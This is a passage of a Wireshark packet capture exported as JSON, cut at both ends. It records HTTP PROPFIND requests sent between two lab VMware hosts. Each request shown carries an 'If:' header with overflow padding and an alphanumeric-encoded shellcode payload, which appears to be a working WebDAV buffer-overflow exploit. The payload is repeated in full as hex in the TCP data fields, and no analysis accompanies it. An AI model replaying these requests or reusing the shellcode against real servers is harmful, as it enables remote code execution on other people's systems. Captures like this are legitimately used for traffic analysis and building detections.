gXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "650"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.933535000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.933535000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.003285000",
|
||
"frame.time_relative": "17.184475000",
|
||
"frame.number": "657",
|
||
"frame.len": "245",
|
||
"frame.cap_len": "245",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "231",
|
||
"ip.id": "0x00002459",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000c51",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "36273",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "36273",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "88",
|
||
"tcp.len": "179",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2053552096",
|
||
"tcp.nxtseq": "1628",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2861845779",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000a345",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:c5:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:c5:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868741",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000224000",
|
||
"tcp.analysis.bytes_in_flight": "1627",
|
||
"tcp.analysis.push_bytes_sent": "1627"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000417000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "656",
|
||
"tcp.segment": "657",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1627",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:58:44:64:79:48:77:70:64:70:79:78:55:4d:68:48:6c:4d:47:63:6c:67:4b:6f:4f:6c:61:49:57:61:70:66:79:64:76:51:43:72:69:59:56:50:63:54:58:44:53:68:50:6b:49:70:49:73:72:6e:57:70:43:e4:ad:82:e6:91:b7:e7:89:b6:e7:91:91:e6:8d:87:e6:95:ba:e6:b5:a8:e4:85:ab:e5:a9:b8:e4:b5:a4:e5:a9:99:e7:89:a8:e6:b5:90:e6:91:8e:e5:8d:b3:e5:91:84:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:ad:b7:e7:89:99:e6:91:94:e6:95:ae:e4:a1:a2:e5:a9:85:e4:ad:b1:e4:b1:94:e4:b9:a9:e4:a5:90:e6:a5:b8:e6:a1:8d:e6:95:b8:e7:a5:89:e4:8d:8a:e4:ad:ae:e7:a5:a6:e5:a5:8d:e7:a1:ba:e5:9d:8a:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:72:56:68:4d:51:5a:64:7a:70:47:46:6a:49:4f:55:52:68:78:44:45:4a:41:69:71:7a:4d:64:47:45:62:6b:50:63:48:58:5a:69:49:77:55:41:48:54:43:56:6f:79:57:67:62:63:48:55:51:71:4c:48:51:e7:85:b6:e7:a1:85:e6:85:97:e6:85:8c:e4:ad:aa:e5:a5:b2:e5:95:98:e6:8d:b0:e5:a9:b7:e4:a1:83:e7:85:b3:e4:a9:a4:e4:85:a5:e7:8d:a7:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:89:8d:e6:85:87:e4:91:98:e4:ad:ac:e1:8f:80:e6:a0:83:e6:9d:a7:e4:b1:ba:e6:99:b9:e7:95:84:e6:b9:91:e5:a9:93:e5:81:8a:e4:85:af:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/XDdyHwpdpyxUMhHlMGclgKoOlaIWapfydvQCriYVPcTXDShPkIpIsrnWpC<70><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/rVhMQZdzpGFjIOURhxDEJAiqzMdGEbkPcHXZiIwUAHTCVoyWgbcHUQqLHQ<48><51><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "659"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.937052000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.937052000",
|
||
"frame.time_delta": "0.000055000",
|
||
"frame.time_delta_displayed": "0.003517000",
|
||
"frame.time_relative": "17.187992000",
|
||
"frame.number": "667",
|
||
"frame.len": "243",
|
||
"frame.cap_len": "243",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "229",
|
||
"ip.id": "0x00002297",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000e15",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "39061",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "39061",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "89",
|
||
"tcp.len": "177",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2101107776",
|
||
"tcp.nxtseq": "1626",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2647513458",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000c4cb",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:c8:00:00:00:00",
|
||
